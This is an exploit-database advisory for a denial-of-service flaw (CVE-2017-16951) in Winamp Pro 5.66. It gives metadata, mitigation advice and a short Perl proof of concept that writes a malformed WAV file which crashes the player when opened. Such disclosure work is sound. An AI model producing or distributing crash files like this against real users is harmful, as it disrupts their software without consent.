Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service

vendor:

Winamp Pro

by:

R.Yavari

5,5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Winamp Pro

Affected Version From: 5.66.Build.3512

Affected Version To: 5.66.Build.3512

Patch Exists: YES

Related CWE: CVE-2017-16951

CPE: a:nullsoft:winamp_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10, Windows 7

2017

Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service

Winamp Pro versions 5.66.Build.3512 and below are vulnerable to a denial of service attack when a specially crafted .wav, .wmv, .au, .asf, .aiff, or .aif file is opened. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Winamp Pro.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: Winamp Pro (.wav|.wmv|.au|.asf|.aiff|.aif ) Denial of Service
# Date: 2017-11-22
# Exploit Author: R.Yavari
# Version: v5.66.Build.3512
# Tested on: Windows 10 , Windows 7
# other version should be affected
# CVE-2017-16951
# http://meggamusic.co.uk/winamp/winamp5666_full_en-us_redux.exe
# (D.P)
open(code, ">winamp.wav") || die "can't create crash sample.$!";
binmode(code);
$data = 
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" .
"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" .
"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" .
"\x13\x00\x13\x00\x12\x00\x14\x00\x14\x00";


print code $data;
 
close(code);